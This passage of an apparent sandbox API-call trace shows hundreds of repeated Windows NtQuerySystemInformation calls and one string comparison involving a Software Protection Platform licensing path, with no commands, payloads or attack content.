Length=0x20, ResultLength=0x0) [0233.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db20, Length=0x50, ResultLength=0x0) [0233.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db20, Length=0x50, ResultLength=0x0) [0233.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db20, Length=0x50, ResultLength=0x0) [0233.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da10, Length=0x50, ResultLength=0x0) [0233.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da10, Length=0x50, ResultLength=0x0) [0233.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da10, Length=0x50, ResultLength=0x0) [0233.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da10, Length=0x50, ResultLength=0x0) [0233.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d940, Length=0x38, ResultLength=0x0) [0233.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d770, Length=0x28, ResultLength=0x0) [0233.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d770, Length=0x28, ResultLength=0x0) [0233.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d770, Length=0x28, ResultLength=0x0) [0233.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d770, Length=0x28, ResultLength=0x0) [0233.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x28, ResultLength=0x0) [0233.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d940, Length=0x38, ResultLength=0x0) [0233.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x28, ResultLength=0x0) [0233.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x28, ResultLength=0x0) [0233.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d700, Length=0x20, ResultLength=0x0) [0233.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d680, Length=0x20, ResultLength=0x0) [0233.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d680, Length=0x20, ResultLength=0x0) [0233.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d680, Length=0x20, ResultLength=0x0) [0233.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d940, Length=0x38, ResultLength=0x0) [0233.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d940, Length=0x38, ResultLength=0x0) [0233.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7c0, Length=0x20, ResultLength=0x0) [0233.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d750, Length=0x20, ResultLength=0x0) [0233.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d750, Length=0x20, ResultLength=0x0) [0233.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd70, Length=0x50, ResultLength=0x0) [0233.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd70, Length=0x50, ResultLength=0x0) [0233.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd70, Length=0x50, ResultLength=0x0) [0233.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc60, Length=0x50, ResultLength=0x0) [0233.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc60, Length=0x50, ResultLength=0x0) [0233.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc60, Length=0x50, ResultLength=0x0) [0233.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc60, Length=0x50, ResultLength=0x0) [0233.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x38, ResultLength=0x0) [0233.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x28, ResultLength=0x0) [0233.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x28, ResultLength=0x0) [0233.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x28, ResultLength=0x0) [0233.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x28, ResultLength=0x0) [0233.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x38, ResultLength=0x0) [0233.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dab0, Length=0x28, ResultLength=0x0) [0233.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dab0, Length=0x28, ResultLength=0x0) [0233.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x38, ResultLength=0x0) [0233.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da10, Length=0x20, ResultLength=0x0) [0233.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0233.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0233.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0233.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x38, ResultLength=0x0) [0233.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da10, Length=0x20, ResultLength=0x0) [0233.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x20, ResultLength=0x0) [0233.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x20, ResultLength=0x0) [0233.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd70, Length=0x50, ResultLength=0x0) [0233.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd70, Length=0x50, ResultLength=0x0) [0233.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd70, Length=0x50, ResultLength=0x0) [0233.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc60, Length=0x50, ResultLength=0x0) [0233.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc60, Length=0x50, ResultLength=0x0) [0233.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc60, Length=0x50, ResultLength=0x0) [0233.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc60, Length=0x50, ResultLength=0x0) [0233.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x38, ResultLength=0x0) [0233.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x28, ResultLength=0x0) [0233.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x28, ResultLength=0x0) [0233.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x28, ResultLength=0x0) [0233.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x28, ResultLength=0x0) [0233.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x38, ResultLength=0x0) [0233.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dab0, Length=0x28, ResultLength=0x0) [0233.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dab0, Length=0x28, ResultLength=0x0) [0233.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x38, ResultLength=0x0) [0233.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da10, Length=0x20, ResultLength=0x0) [0233.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0233.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0233.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0233.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x38, ResultLength=0x0) [0233.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da10, Length=0x20, ResultLength=0x0) [0233.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x20, ResultLength=0x0) [0233.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x20, ResultLength=0x0) [0233.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de20, Length=0x50, ResultLength=0x0) [0233.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dda0, Length=0x28, ResultLength=0x0) [0233.349] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0233.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de20, Length=0x50, ResultLength=0x0) [0233.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de20, Length=0x50, ResultLength=0x0) [0233.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de20, Length=0x50, ResultLength=0x0) [0233.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd50, Length=0x38, ResultLength=0x0) [0233.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db80, Length=0x28, ResultLength=0x0) [0233.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db80, Length=0x28, ResultLength=0x0) [0233.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db80, Length=0x28, ResultLength=0x0) [0233.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbf0, Length=0x28, ResultLength=0x0) [0233.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd50, Length=0x38, ResultLength=0x0) [0233.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc70, Length=0x28, ResultLength=0x0) [0233.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc70, Length=0x28, ResultLength=0x0) [0233.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd50, Length=0x38, ResultLength=0x0) [0233.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbd0, Length=0x20, ResultLength=0x0) [0233.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x20, ResultLength=0x0) [0233.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x20, ResultLength=0x0) [0233.358] NtQuerySystemInformation 